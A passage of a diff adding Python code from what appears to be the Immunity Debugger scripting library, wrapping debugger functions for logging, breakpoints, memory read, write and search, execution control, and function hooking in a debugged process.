+ This function shows an Error dialog with a custom message.
+
+ @type msg: STRING
+ @param msg: Message
+ """
+ return debugger.Error( msg )
+
+ def openTextFile(self,path=""):
+ """
+ Opens text file in MDI windows. ( if no path is specified browsefile dialog will pop up )
+
+ @type: STRING
+ @param: (Optional, Def= "") Path to file
+ """
+ if (len(path) > 0):
+ return debugger.Opentextfile(path)
+ else:
+ return debugger.Opentextfile()
+
+ def setStatusBar(self, msg):
+ """
+ Sets the status bar message.
+
+ @type msg: STRING
+ @param msg: Message
+ """
+ return debugger.Infoline(msg)
+
+ def clearStatusBar(self):
+ """
+ Removes the current status bar message.
+ """
+ return debugger.Infoline()
+
+ def logLines(self, data, address = 0, highlight = False, gray = False , focus = 0):
+ """
+ Adds multiple lines of ASCII text to the log window.
+
+ @type msg: LIST of STRING
+ @param msg: List of Message to add (max size of msg is 255 bytes)
+
+ @type address: DWORD
+ @param address: Address associated with the message
+
+ @type highlight: BOOLEAN
+ @param highlight: Set highlight text
+
+ @type gray: BOOLEAN
+ @param gray: Set gray text
+ """
+ return [ self.Log(d, address, highlight, gray, focus) for d in data.split("\n") ]
+
+ def LogLines(self,data,address = 0, highlight = False, gray = False , focus = 0):
+ return [ self.Log(d, address, highlight, gray, focus) for d in data.split("\n") ]
+
+
+ def Log(self, msg, address = 0xbadf00d ,highlight = False, gray = False , focus = 0):
+ """
+ Adds a single line of ASCII text to the log window.
+
+ @type msg: STRING
+ @param msg: Message (max size is 255 bytes)
+
+ @type address: DWORD
+ @param address: Address associated with the message
+
+ @type highlight: BOOLEAN
+ @param highlight: Set highlight text
+
+ @type gray: BOOLEAN
+ @param gray: Set gray text
+ """
+ if gray and not highlight:
+ highlight = -1
+ return debugger.Addtolist( address, int(highlight), msg[:255],focus)
+
+ def updateLog(self):
+ """
+ Forces an immediate update of the log window.
+ """
+ debugger.Updatelist()
+
+ def createLogWindow(self):
+ """
+ Creates or restores the log window.
+ """
+ return debugger.Createlistwindow()
+
+ def createWindow(self, title, col_titles):
+ """
+ Creates a custom window.
+
+ @type title: STRING
+ @param title: Window title
+
+ @type col_titles: LIST OF STRING
+ @param col_titles: Column titles list
+
+ @return HWND: Handler of created table
+ """
+ return self.createTable( title, col_titles )
+
+ def createTable(self,title,col_titles):
+ """
+ Creates a custom window.
+
+ @type title: STRING
+ @param title: Window title
+
+ @type col_titles: LIST OF STRING
+ @param col_titles: Column titles list
+
+ """
+ return Table(self,title,col_titles)
+
+ def setFocus(self,handler):
+ """
+ Set focus on window.
+
+ @type handler: ULONG
+ @param handler: Windows Handler
+
+ @return phandler: Handle to the window that previously had the focus.
+ """
+ return debugger.SetFocus(handler)
+
+ def isValidHandle(self,handler):
+ """
+ Does a window still exist?
+
+ @type handler: ULONG
+ @param handler: Windows to check handle
+
+ @return: INT : 1 Exists, 0 Doesnt exist
+ """
+ return debugger.IsValidHandle(handler)
+
+ def setStatusBarandLog(self, addr, msg):
+ """
+ Sets and logs a status bar message.
+
+ @type addr: DWORD
+ @param addr: Address related with the message
+
+ @type msg: STRING
+ @param msg: Message
+ """
+ return debugger.Message(addr, msg)
+
+ def flashMessage(self, msg):
+ """
+ Flashes a message at status bar.
+
+ @type msg: STRING
+ @param msg: Message
+ """
+ return debugger.Flash(msg)
+
+ def setProgressBar(self, message, promille=100):
+ """
+ Displays a progress bar which can contain formatted text and a progress percentage.
+ If the formatted text contains a dollar sign ('$') it will be replaced by the current progress percentage.
+
+ @type msg: STRING
+ @param msg: Message
+
+ @type promille: DWORD
+ @param promille: Progress. At 0 the progress bar is closed and the previous message restored.
+ """
+ return debugger.Progress(promille, message)
+
+ def closeProgressBar(self):
+ """
+ Close Progress Bar.
+ """
+ return debugger.Progress(0, "")
+
+ def getComment(self, address,type=0xFD):
+ """
+ Get the comment of the opcode line.
+
+ @type address: DWORD
+ @param address: Address of the requested comment
+
+ @rtype: STRING
+ @return: Requested comment
+ """
+ comment=None
+ #First, try to fetch any comment
+ if type == 0xFD:
+ #alway look for user defined comments first
+ comment=debugger.Getcomment(address,NM_COMMENT)
+ if not comment:
+ #try argument comment
+ comment=debugger.Getcomment(address,NM_ARG)
+ if not comment:
+ #try library comment
+ comment=debugger.Getcomment(address,NM_LIBCOMM)
+ if not comment:
+ #try Analyse comment
+ comment=debugger.Getcomment(address,NM_ANALYSE)
+ else:
+ #Let the user pick the comment type
+ comment=debugger.Getcomment(address,type)
+
+ return comment
+
+
+ #If you are unsure about what kind of comment are you looking for,
+ #dont use this methods, and go for the automatic one "getComment(address)"
+
+ def getUserComment(self,address):
+ return debugger.Getcomment(address,NM_COMMENT)
+
+ def getArgumentsComment(self,address):
+ return debugger.Getcomment(address,NM_ARG)
+
+ def getAnalyseComment(self,address):
+ return debugger.Getcomment(address,NM_ANALYSE)
+
+ def getLibraryComment(self,address):
+ return debugger.Getcomment(address,NM_LIBCOMM)
+
+
+ def setComment(self, address, comment):
+ """
+ Set a comment.
+
+ @type address: DWORD
+ @param address: Address of the Comment
+
+ @type comment: STRING
+ @param comment: Comment to add
+ """
+ return debugger.Setcomment(address, comment)
+
+ def setLabel(self, address, label):
+ """
+ Set a label.
+
+ @type adresss: DWORD
+ @param address: Address to the new label
+
+ @type label: STRING
+ @param label: Label to add
+ """
+ return debugger.Setlabel(address, label)
+
+ def markBegin(self):
+ """
+ Place a start mark for timming your script
+ """
+ self.timer=time.clock()
+
+ def markEnd(self):
+ """
+ Place an End mark for timming your script
+
+ @rtype time: DWORD
+ @return time: time in seconds
+ """
+ if self.timer >0:
+ return time.clock() - self.timer
+ else:
+ return 0
+
+ def findDependecies(self, lookfor):
+ """
+ Find exported function on the loaded dlls.
+
+ @type lookfor: TABLE of DWORD
+ @param lookfor: Table of functions to search
+
+ @rtype: DICTIONARY
+ @return: Dictionary
+ """
+ #lookfor = ["rpcrt4.rpcserveruseprotseq","rpcrt4.rpcserveruseprotseqex","rpcrt4.rpcserveruseprotseqw", "rpcrt4.rpcserveruseprotseqEp", "rpcrt4.rpcserveruseprotseqif",\
+ # "rpcrt4.rpcserveruseallprotseqs", "rpcrt4.rpcserveruseallprotseqsif", "rpcrt4.rpcserveruseprotseqepw",\
+ # "rpcrt4.rpcserveruseprotseqepexw", "rpcrt4.rpcserveruseallprotseqsifw"]
+ symbol = self.getAllSymbols()
+
+ result = {}
+ for modname in symbol.keys():
+ modsym = symbol[modname]
+ for modaddr in modsym.keys():
+ mod = modsym[modaddr]
+ if mod.name.lower() in lookfor:
+ if mod.type == "Import":
+ if result.has_key(modname):
+ result[modname].append(mod)
+ else:
+ result[modname] = [mod]
+ return result
+
+
+
+ def isvmWare(self):
+ """
+ Check if debugger is running under a vmware machine
+
+ @rtype: DWORD
+ @return: 1 if vmware machine exists
+ """
+ return debugger.checkvmWare()
+
+
+
+
+
+ ### Breakpoint Functions ###
+ # All kind of breakpoint functions
+
+ # For manual breakpoints:
+ # key shiftkey Action
+ # VK_F2 0 Toggle unconditional breakpoint
+ # VK_F2 Pressed (not 0) Set conditional breakpoint
+ # VK_F4 Pressed (not 0) Set logging breakpoint
+
+ def ManualBreakpoint(self, address, key, shiftkey, font):
+ """
+ Set a Manual Breakpoint.
+
+ @type address: DWORD
+ @param address: Address of the breakpoint
+
+ @type key: DWORD
+ @param key: VK_F2 (Conditional Breakpoint) or VK_F4 (Logging Breakpoint)
+
+ @type shiftkey: DWORD
+ @param shiftkey: State of the shiftkey
+
+ @type font: STRING
+ @param font: See ImmFonts
+ """
+ if not ImmFonts.has_key( font.lower() ):
+ font = ImmFonts[ "fixed" ]
+ else:
+ font = ImmFonts[ font.lower() ]
+
+ return debugger.Manualbreakpoint(address, key, int(shiftkey), font)
+
+ def setUnconditionalBreakpoint(self, address, font="fixed"):
+ """
+ Set an Unconditional Breakpoint.
+
+ @type address: DWORD
+ @param address: Address for the breakpoint
+
+ @type font: STRING
+ @param font: (Optional, Def: fixed) Font for the breakpoint
+ """
+ return self.ManualBreakpoint(address, BpKeys["VK_F2"], False, font)
+
+ def setConditionalBreakpoint(self, address, font="fixed"):
+ """
+ Set a Conditional Breakpoint.
+
+ @type address: DWORD
+ @param address: Address for the breakpoint
+
+ @type font: STRING
+ @param font: (Optional, Def: fixed) Font for the breakpoint
+ """
+ return self.ManualBreakpoint(address, BpKeys["VK_F2"], True, font)
+
+ def setLoggingBreakpoint(self, address):
+ """
+ Set a Logging Breakpoint. (This breakpoint will not puase the execution, it will just act as a Watch point"
+
+ @type address: DWORD
+ @param address: Address for the breakpoint
+ """
+ return debugger.Setloggingbreakpoint(address)
+
+ def setWatchPoint(self,address):
+ """
+ Set a watching Breakpoint.
+
+ @type address: DWORD
+ @param address: Address for the watchpoint
+ """
+ return debugger.Setloggingbreakpoint(address)
+
+
+#define TY_SET 0x00000100 // Code INT3 is in memory
+#define TY_ACTIVE 0x00000200 // Permanent breakpoint
+#define TY_DISABLED 0x00000400 // Permanent disabled breakpoint
+#define TY_ONESHOT 0x00000800 // Temporary stop
+#define TY_TEMP 0x00001000 // Temporary breakpoint
+#define TY_KEEPCODE 0x00002000 // Set and keep command code
+#define TY_KEEPCOND 0x00004000 // Keep condition unchanged (0: remove)
+#define TY_NOUPDATE 0x00008000 // Don't redraw breakpoint window
+#define TY_RTRACE 0x00010000 // Pseudotype of run trace breakpoint
+
+ def setTemporaryBreakpoint(self, address, continue_execution = False, stoptrace = False):
+ """
+ Set a Temporary Breakpoint.
+
+ @type address: DWORD
+ @param address: Address for the breakpoint
+
+ @type continue_execution: BOOLEAN
+ @param continue_execution: Automatically removes temporary breakpoint when hit and continue execution
+
+ @type stoptrace: BOOLEAN
+ @param stoptrace: Stop any kind of trace or animation when hit
+ """
+ if continue_execution:
+ flags = BpFlags["TY_TEMP"] | BpFlags["TY_KEEPCOND"]
+ else:
+ flags = BpFlags["TY_ONESHOT"] | BpFlags["TY_KEEPCOND"]
+ if stoptrace:
+ flags |= BpFlags["TY_STOPAN"]
+
+ return debugger.Tempbreakpoint(address, flags)
+
+ def setBreakpoint(self, address):
+ """
+ Set a Breakpoint.
+
+ @type address: DWORD
+ @param address: Address for the breakpoint
+ """
+ flags = BpFlags["TY_ACTIVE"]
+ return debugger.Setbreakpoint(address, flags, "")
+
+ def setBreakpointOnName(self,name):
+ """
+ Set a Breakpoint.
+
+ @type Name: STRING
+ @param Name: name of the function to bp
+
+ @rtype: DWORD
+ @return: Address of name
+ """
+ return debugger.Setbreakpointonname(name)
+
+ def disableBreakpoint(self, address):
+ """
+ Disable Breakpoint.
+
+ @type address: DWORD
+ @param address: Address for the breakpoint
+ """
+ flags = BpFlags["TY_DISABLED"]
+ return debugger.Setbreakpoint(address, flags, "")
+
+ def deleteBreakpoint(self,address,address2=0):
+ """
+ Delete Breakpoint.
+
+ @type address: DWORD
+ @param address: Start range of addresses to delete breakpoints
+ @type address2: DWORD
+ @param Address: End range of addresses to delete breakpoints
+ """
+ return debugger.DeleteBreakpoints(address,address2)
+
+
+ def getBreakpointType(self, address):
+ """
+ Get the Breakpoint type.
+
+ @type address: DWORD
+ @param address: Address for the breakpoint
+
+ @rtype: STRING
+ @return: Breakpoint type
+ """
+
+ type = debugger.Getbreakpointtypecount(address)
+ for a in BpFlags.keys():
+ if BpFlags[a] == type:
+ return a
+ return ""
+
+ def setMemBreakpoint(self,addr, type, size=4):
+ """
+ Modifies or removes a memory breakpoint.
+
+ @type address: DWORD
+ @param address: Address for the breakpoint
+
+ @type type: DWORD
+ @param type: Type of Memory Breakpoint (READ/WRITE/SFX)
+
+ @type size: DWORD
+ @param size: (Optional, Def: 4) Size of Memory Breakpoint
+ """
+ ty = type.strip().split("|")
+ flags = 0
+ for a in ty:
+ try:
+ flags |= BpMemFlags[a]
+ except KeyError:
+ raise Exception("Bad Flags for setMembreakpoint: %s" % type)
+
+ return debugger.Setmembreakpoint(flags, addr, size)
+
+ def disableMemBreakpoint(self, addr):
+ """
+ Disable Memory Breakpoint.
+ """
+ return debugger.Setmembreakpoint(0, addr,0)
+
+
+ def setHardwareBreakpoint(self,addr,type=HB_CODE,size=1):
+ """
+ Sets Hardware breakpoint
+ """
+ return debugger.Sethardwarebreakpoint(type,addr,size)
+
+
+ ### Read/Write/Search ###
+ # Read/Write from process memory
+
+ def writeLong(self, address, dword):
+ """
+ Write long to memory address.
+
+ @type address: DWORD
+ @param address: Address
+
+ @type dword: DWORD
+ @param dword: long to write
+ """
+ return debugger.Writememory( immutils.intel_order( dword ), address, 4, 0x2 )
+
+ def writeMemory(self, address, buf):
+ """
+ Write buffer to memory address.
+
+ @type address: DWORD
+ @param address: Address
+
+ @type buf: BUFFER
+ @param buf: Buffer
+ """
+ return debugger.Writememory(buf, address, len(buf), 0x2)
+
+ def readMemory(self, address, size):
+ """
+ Read block of memory.
+
+ @type address: DWORD
+ @param address: Address
+
+ @type size: DWORD
+ @param size: Size
+
+ @rtype: BUFFER
+ @return: Process memory
+ """
+ return debugger.Readmemory(address, size, 0x01|0x02)
+
+ def readLong(self, address):
+ """
+ Read a Long from the debugged process
+
+ @type address: DWORD
+ @param address: Address
+
+ @rtype: DWORD
+ @return: Long
+ """
+ long = self.readMemory(address, 0x4)
+ if len(long) == 4:
+ try:
+ return immutils.str2int32_swapped(long)
+ except ValueError:
+ raise Exception, "readLong failed to gather a long at 0x%08x" % address
+ else:
+ raise Exception, "readLong failed to gather a long at 0x%08x" % address
+
+ def readString(self, address):
+ """
+ Read a string from the remote process
+
+ @type address: DWORD
+ @param address: Address of the string
+
+ @rtype: String
+ @return: String
+ """
+ return self.readUntil(address, '\x00')
+
+ def readWString(self,address):
+ """
+ Read a unicode string from the remote process
+
+ @type address: DWORD
+ @param address: Address of the unicode string
+
+ @rtype: Unicode String
+ @return: Unicode String
+ """
+ wstring = self.readUntil(address, "\x00\x00")
+
+ if not wstring.endswith("\x00"):
+ wstring = wstring + "\x00"
+
+ return wstring
+
+ def readUntil(self, address, ending):
+ """
+ Read string until ending starting at given address
+
+ @param Address: Start address
+ @return Readed String
+ """
+ readed=[]
+ while(1):
+ read = self.readMemory( address, 16 )
+ address += 16
+ ndx = read.find(ending)
+ if ndx != -1:
+ readed.append( read[0:ndx] )
+ break
+ else:
+ readed.append( read )
+
+ return string.joinfields(readed, "")
+
+ def readShort(self, address):
+ """
+ Read a short integer from the remote process
+
+ @type address: DWORD
+ @param address: Address of the short
+
+ @rtype: Short Integer
+ @return: Short
+ """
+ short = self.readMemory(address, 0x2)
+ return immutils.str2int16_swapped(short)
+
+ def searchShort(self, short , flag=None):
+ """
+ Search a short integer on the remote process memory
+
+ @type short: SHORT
+ @param short: Short integer to search for
+
+ @type flag: STRING
+ @param flag: Memory Protection String Flag
+
+ @rtype: List
+ @return: List of address of the short integer founded
+ """
+ return self.Search(immutils.int2str16_swapped(short),flag)
+
+ def searchLong(self, long, flag=None):
+ """
+ Search a short integer on the remote process memory
+
+ @type long: DWORD
+ @param long: integer to search for
+ @type flag: STRING
+ @param flag: Memory Protection String Flag
+
+ @rtype: List
+ @return: List of address of the integer founded
+ """
+ return self.Search( immutils.int2str32_swapped(long),flag)
+
+ def searchOnExecute(self,buf):
+ """
+ Search string in executable memory.
+
+ @param buf: Buffer to search for
+ @return: A list of address where the string was found on memory
+ """
+ if not buf:
+ return []
+ self.getMemoryPages()
+ find = []
+ buf_size = len(buf)
+ for a in self.MemoryPages.keys():
+ if (MemoryProtection["PAGE_EXECUTE"] == self.MemoryPages[a].access\
+ or MemoryProtection["PAGE_EXECUTE_READ"] == self.MemoryPages[a].access\
+ or MemoryProtection["PAGE_EXECUTE_READWRITE"] == self.MemoryPages[a].access\
+ or MemoryProtection["PAGE_EXECUTE_WRITECOPY"] == self.MemoryPages[a].access):
+ mem = self.MemoryPages[a].getMemory()
+ if not mem:
+ continue
+ ndx = 0
+ while 1:
+ f = mem[ndx:].find( buf )
+ if f == -1 : break
+ find.append( ndx + f + a )
+ ndx += f + buf_size
+ return find
+
+ def searchOnWrite(self,buf):
+ """
+ Search string in writable memory.
+
+ @param buf: Buffer to search for
+ @return: A list of address where the string was found on memory
+ """
+ if not buf:
+ return []
+ self.getMemoryPages()
+ find = []
+ buf_size = len(buf)
+ for a in self.MemoryPages.keys():
+ if (MemoryProtection["PAGE_READWRITE"] == self.MemoryPages[a].access\
+ or MemoryProtection["PAGE_WRITECOPY"] == self.MemoryPages[a].access\
+ or MemoryProtection["PAGE_EXECUTE_READWRITE"] == self.MemoryPages[a].access\
+ or MemoryProtection["PAGE_EXECUTE_WRITECOPY"] == self.MemoryPages[a].access):
+ mem = self.MemoryPages[a].getMemory()
+ if not mem:
+ continue
+ ndx = 0
+ while 1:
+ f = mem[ndx:].find( buf )
+ if f == -1 : break
+ find.append( ndx + f + a )
+ ndx += f + buf_size
+ return find
+
+ def searchOnRead(self,buf):
+ """
+ Search string in readable memory.
+
+ @param buf: Buffer to search for
+ @return: A list of address where the string was found on memory
+ """
+ if not buf:
+ return []
+ self.getMemoryPages()
+ find = []
+ buf_size = len(buf)
+ for a in self.MemoryPages.keys():
+ if (MemoryProtection["PAGE_READONLY"] == self.MemoryPages[a].access\
+ or MemoryProtection["PAGE_EXECUTE_READ"] == self.MemoryPages[a].access):
+ mem = self.MemoryPages[a].getMemory()
+ if not mem:
+ continue
+ ndx = 0
+ while 1:
+ f = mem[ndx:].find( buf )
+ if f == -1 : break
+ find.append( ndx + f + a )
+ ndx += f + buf_size
+ return find
+
+
+
+
+
+ def Search( self, buf, flag = None ):
+ if not buf:
+ return []
+
+ self.getMemoryPages()
+ find = []
+ buf_len = len(buf)
+
+ for a in self.MemoryPages.keys():
+ if flag:
+ if (MemoryProtection[flag] == self.MemoryPages[a].access):
+ mem = self.MemoryPages[a].getMemory()
+ if not mem:
+ continue
+
+ mem_list = mem.split( buf )
+ total_length = buf_len * -1
+ recur_find = []
+ for i in mem_list:
+
+ total_length = total_length + len(i) + buf_len
+ recur_find.append( a + total_length )
+
+ # The last one is the remaining slice from the split
+ # so remove it from the list
+ del recur_find[ len(recur_find) - 1 ]
+ find += recur_find
+
+ else:
+ mem = self.MemoryPages[a].getMemory()
+ if not mem:
+ continue
+ mem_list = mem.split( buf )
+ total_length = buf_len * -1
+ recur_find = []
+ for i in mem_list:
+
+ total_length = total_length + len(i) + buf_len
+ recur_find.append( a + total_length )
+
+ # The last one is the remaining slice from the split
+ # so remove it from the list
+ del recur_find[ len(recur_find) - 1 ]
+ find += recur_find
+
+ return find
+
+
+ def oldSearch(self, buf,flag=None):
+ """
+ Search string in memory.
+
+ @param buf: Buffer to search for
+ @param flag: Memory Protection String Flag
+ @return: A list of address where the string was found on memory
+
+
+ """
+ if not buf:
+ return []
+
+ self.getMemoryPages()
+ find = []
+ buf_size = len(buf)
+ for a in self.MemoryPages.keys():
+ if flag:
+ if (MemoryProtection[flag] == self.MemoryPages[a].access):
+ mem = self.MemoryPages[a].getMemory()
+ if not mem:
+ continue
+ ndx = 0
+ while 1:
+ f = mem[ndx:].find( buf )
+ if f == -1 : break
+ find.append( ndx + f + a )
+ ndx += f + buf_size
+ else:
+ mem = self.MemoryPages[a].getMemory()
+ if not mem:
+ continue
+ ndx = 0
+ while 1:
+ f = mem[ndx:].find( buf )
+ if f == -1 : break
+ find.append( ndx + f + a )
+ ndx += f + buf_size
+ return find
+
+ def searchCommands(self, cmd):
+ """
+ Search for a sequence of commands in all executable modules loaded.
+ @type cmd: STRING
+ @param cmd: Assembly code to search for (Search using regexp is available. See Documentation)
+
+ @rtype: List
+ @return: List of address of the command found
+
+ NOTE: Since ImmunityDebugger 1.2 , the returning tuple[1] value is deprecated,
+ if you need the opcode string of the resulted address, you'll have to do a immlib.Disasm(tuple[0]).
+
+ """
+ address=0 # all loaded modules
+ return debugger.Searchregexp(address,cmd)
+
+ def searchCommandsOnModule(self,address,cmd):
+ """
+ Search for a sequence of commands in given executable module.
+ @type cmd: STRING
+ @param cmd: Assembly code to search for (Search using regexp is available. See Documentation)
+
+ @rtype: List
+ @return: List of address of the command found
+
+ NOTE: Since ImmunityDebugger 1.2 , the returning tuple[1] value is deprecated,
+ if you need the opcode string of the resulted address, you'll have to do a immlib.Disasm(tuple[0]).
+
+ """
+ return debugger.Searchregexp(address,cmd)
+
+ ### Execution control ###
+ # All kind of functions that interact with code execution
+
+ def Run(self, address=0):
+ """Run Process untill address.
+ @param address: Address"""
+ self.clearState()
+ return debugger.Run(address)
+
+ def runTillRet(self):
+ """Run Process till ret.
+ """
+ self.clearState()
+ return debugger.Runtillret()
+
+
+ def Pause(self):
+ """Pause process"""
+ return debugger.Pause()
+
+ def stepOver(self, address=0):
+ """
+ Step-Over Process untill address.
+
+ @type address: DWORD
+ @param address: (Optional, Def = 0) Address
+ """
+ self.clearState()
+ return debugger.Stepover(address)
+
+ def stepIn(self, address=0):
+ """
+ Step-in Process untill address.
+
+ @type address: DWORD
+ @param address: (Optional, Def = 0) Address
+ """
+ self.clearState()
+ return debugger.Stepin(address)
+
+ def quitDebugger(self):
+ """
+ Quits debugger
+ """
+ return debugger.exitID()
+
+
+ def ignoreSingleStep(self,flag="CONTINUE"):
+ """
+ Ignore Single Step events
+ @type flag: STRING
+ @param flag: How to continue after a single event is catched
+ flag = DISABLE : Disable ignoring
+ flag = FORCE : Conventional Force continue method
+ flag = CONTINUE : Transparent continue method
+
+ CAUTION: This method overrides GUI option 'single-step break'
+ """
+ return debugger.IgnoreSingleStep(IgnoreSingleStep[flag])
+
+ #Consider the following three methods of experimental nature.
+ def openProcess(self, path,mode=0):
+ """
+ Open process for debugging
+ @type path: STRING
+ @param path: Path to file to debug
+ @type mode: INTEGER
+ @param mode: How to start: -2 SILENT, 0 NORMAL
+ """
+ return debugger.Open(path,mode)
+
+ def restartProcess(self,mode=-1):
+ """
+ Restart debuggee
+ @type mode: INTEGER
+ @param mode: How to restart : -2 SILENT, -1 MSGBOX
+
+ """
+ return debugger.Open("",mode)
+
+
+ def Attach(self, pid):
+ """
+ Attach to an active process
+ @type pid: INTEGER
+ @param pid: Process Id.
+ """
+ return debugger.Attach(pid)
+
+ def Dettach(self):
+ """
+ Dettach from active process
+ """
+ #this methos is still very experimental
+ return debugger.Dettach()
+
+
+ def prepareForNewProcess(self):
+ """
+ Prepare Debugger for fresh debugging session
+ NOTE: be sure to know what you are doing when
+ calling this method
+ """
+ return debugger.Preparefornewps()
+
+
+
+
+
+
+
+
+
+
+
+
+ ### GUI interaction ###
+ # Whatever interaction on the gui
+
+ def goSilent(self,silent):
+ """ Set/Unset silent debugging flag
+ @type silent: INTEGER
+ @param silent: 1 to set silent, 0 to unset
+ """
+ return debugger.GoSilent(silent)
+
+ def addHeader(self,address,header,color="Black"):
+ """
+ Add a header to given row.
+ @type address: DWORD
+ @param address: Address to add the header into
+ @type header: STRING
+ @param header: Header string to add into row
+ @type color: STRING
+ @param color: Color of text
+ """
+ return debugger.AddHeaderToRow(address,header,ImmDrawColors[color])
+
+ def removeHeader(self,address):
+ """
+ Removes header from row.
+ @type address: DWORD
+ @param address: Address to remove the header from
+ """
+ return debugger.RemoveHeaderFromRow(address)
+
+ def removeLine(self,address):
+ """
+ Removes header from row.
+ @type address: DWORD
+ @param address: Address to remove the header from
+ """
+ return debugger.RemoveHeaderFromRow(address)
+
+ def getHeader(self,address):
+ """
+ Get Header from row.
+ @type address: DWORD
+ @param address: Address to get the headers from
+ @return PYLIST: List of strings
+ """
+ return debugger.GetHeaderFromRow(address)
+
+
+
+
+ def addLine(self,address,header,color="Black"):
+ """
+ Add a line to cpu window.
+ @type address: DWORD
+ @param address: Address to add line
+ @type header: STRING
+ @param header: Header string to add into row
+ @type color: STRING
+ @param color: Color of text
+ """
+ return debugger.AddHeaderToRow(address,header,ImmDrawColors[color])
+
+
+ def gotoDisasmWindow(self, addr):
+ """
+ GoTo the Disassembler Window.
+
+ @type addr: DWORD
+ @param addr: Address to show on the Disassembler Window
+ """
+ return debugger.Setcpu( self.threadid, addr, 0, 0, 0x8000L) # redraw
+
+ def gotoDumpWindow(self, addr):
+ """
+ GoTo Dump Window.
+
+ @type addr: DWORD
+ @param addr: Address to show on the Dump Window
+ """
+ return debugger.Setcpu( self.threadid, 0, addr, 0, 0x8000L) # redraw
+
+ def gotoStackWindow(self, addr):
+ """
+ GoTo the Stack Window.
+ @type addr: DWORD
+ @param addr: Address to show on the Stack Window
+ """
+ return debugger.Setcpu( self.threadid, 0, 0, addr, 0x8000L) # redraw
+
+ def inputBox(self,title):
+ """
+ Creates Dialog with an Inputbox.
+
+ @type title: STRING
+ @param title: Title for the Inputbox dialog
+
+ @return: String from the inputbox
+ """
+ return debugger.Inputbox(title)
+
+ def comboBox(self,title,combolist):
+ """
+ Creates Dialog with a Combobox.
+
+ @type title: STRING
+ @param title: Title for the dialog
+
+ @type combolist: LIST
+ @param combolist: List of items to add to combo dialog
+
+ @return: Selected item
+ """
+ return debugger.Combobox(title,combolist,len(combolist))
+
+
+
+ ### Debugger State ###
+ # The state of the debugger
+
+ def getStatus(self):
+ """
+ Get the status of the debugged process.
+
+ @return: Status of the debugged process
+ """
+ return debugger.Getstatus()
+
+ def isStopped(self):
+ """
+ Is the debugged process stopped?
+
+ @rtype: BOOL
+ @return: Boolean (True/False)
+ """
+ return DebugerStatus["STOPPED"] == self.getStatus()
+
+ def isEvent(self):
+ """
+ Is the debugged process in an event state?
+
+ @rtype: BOOL
+ @return: Boolean (True/False)
+ """
+ return DebugerStatus["EVENT"] == self.getStatus()
+
+ def isRunning(self):
+ """
+ Is the debugged process running?
+
+ @rtype: BOOL
+ @return: Boolean (True/False)
+ """
+ return DebugerStatus["RUNNING"] == self.getStatus()
+
+ def isFinished(self):
+ """
+ Is the debugged process finished?
+
+ @rtype: BOOL
+ @return: Boolean (True/False)
+ """
+ return DebugerStatus["FINISHED"] == self.getStatus()
+
+ def isClosing(self):
+ """
+ Is the debugged process closed?
+
+ @rtype: BOOL
+ @return: Boolean (True/False)
+ """
+ return DebugerStatus["CLOSING"] == self.getStatus()
+
+
+
+ ### Hooks ###
+
+ def listHooks(self):
+ """
+ List of active hooks
+
+ @rtype: LIST
+ @return: List of active hooks
+ """
+ return debugger.Listhook()
+
+ def removeHook(self,hook_str):
+ """Unhook from memory
+ """
+ debugger.Removehook(hook_str)
+
+
+
+ def _getHookEntry(self, entry):
+ tbl = []
+ # We need to use HOOK_REG, since some of the original register
+ # are saved on the stack
+ try:
+ reg = HOOK_REG[ entry[0] ]
+ tbl.append( "MOV EAX, %s" % reg )
+ except KeyError:
+ if entry[0] == 'ESP':
+ tbl.append("LEA EAX, [ESP+0x14]")
+ elif type( entry[0] ) == type(0):
+ tbl.append("MOV EAX, [0x%08x]" % entry[0] )
+ else:
+ return []
+
+
+ if len(entry) == 2:
+ tbl.append( "MOV EAX, [EAX + 0x%x]" % entry[1] )
+ tbl.append( "STOSD" )
+
+ return tbl
+
+ # afterHookAddr = hookAddr + idx
+ # ndx = function num
+ # table = [ (reg), (reg, offset) ]
+ def _createCodeforHook( self, memAddress, afterHookAddr, ndx, table, execute_prelude, alloc_size):
+ # SAVING REGS, WE DONT WANT TO TOUCH ANYTHING!
+ # XXX: Replace it with a PUSHA/POPA
+ # Add a global deadlock
+ alloc_stub = [ "PUSHAD" ] # Save all registers
+ alloc_stub += [ "MOV EBX, 0x%08x" % memAddress ] #
+ alloc_stub += [ "MOV EDI, [EBX]"] # GETTING A POINTER to top of data
+ alloc_stub += [ "CMP DWORD DS:[EBX+4],1"] # Check the deadlock
+ alloc_stub += [ "JZ -C" ] # If its in use, loop
+ alloc_stub += [ "MOV DWORD DS:[EBX+4],1"] # Turn deadlock on
+ alloc_stub += [ "MOV EAX, EDI"]
+ alloc_stub += [ "SUB EAX, EBX"]
+ alloc_stub += [ "ADD EAX, 0x%08x" % (len(table) * 4 + 4) ]
+ alloc_stub += [ "CMP EAX, 0x%08x" % alloc_size] # Did we reach the end of memory?
+ # JE -> JMP TO THE END OF THE FUNCTION
+ alloc_stub_reg = [ "MOV EAX, 0x%x" % ndx]
+ alloc_stub_reg += [ "STOSD"] # SAVE IN MEMORY THE FUNCTION NUMBER
+ for entry in table:
+ alloc_stub_reg += self._getHookEntry( entry ) # Get all the regs/mem and save them in data
+ alloc_stub_reg += [ "MOV [EBX], EDI"] # Save the top of the data
+ alloc_stub_reg += [ "MOV DWORD DS:[EBX+4],0"] # Turn Lock OFF
+
+ alloc_stub_pos = [ "POPAD"] # Restore register
+ # Right here is where the 'saved' instruction
+ # of the hook are executed
+ alloc_ret = "PUSH 0x%08x\nRET" % afterHookAddr # Back to the function
+
+ code = self.Assemble( "\n".join( alloc_stub ) )
+ reg_code = self.Assemble( "\n".join( alloc_stub_reg ) )
+ code += "\x0f\x83" + struct.pack("L", len(reg_code) )
+ code += reg_code
+ code += self.Assemble( "\n".join( alloc_stub_pos ) )
+ code += execute_prelude
+ code += self.Assemble( alloc_ret )
+
+ return code
+
+
+ def addFastLogHook(self, hook, alloc_size = 0x100000):
+ CODE_HOOK_START = 8
+ flh = hook
+ # Get the table of functions from the hook
+ table = flh.get()
+ # Allocate memory for the hook and the log
+ memAddress = self.remoteVirtualAlloc( alloc_size )
+ self.Log( "Logging at 0x%08x" % memAddress )
+
+ # MEMORY LOOKS LIKE:
+ # mem [ ptr to data ]
+ # mem + 4 [ deadlock ]
+ # mem + 8 [ start of hook code ]
+ # mem + n [ ... ]
+ # mem + n [ start of data ]
+
+ ptr = memAddress + CODE_HOOK_START
+
+ fn_restore = []
+
+ for fn_ndx in range( 0, len(table) ):
+ hookAddress = table[ fn_ndx ][0]
+ entry = table[ fn_ndx ][1]
+
+ idx = 0
+ #patch_code = self.Assemble( "PUSH 0x%08x\nRET" % ptr )
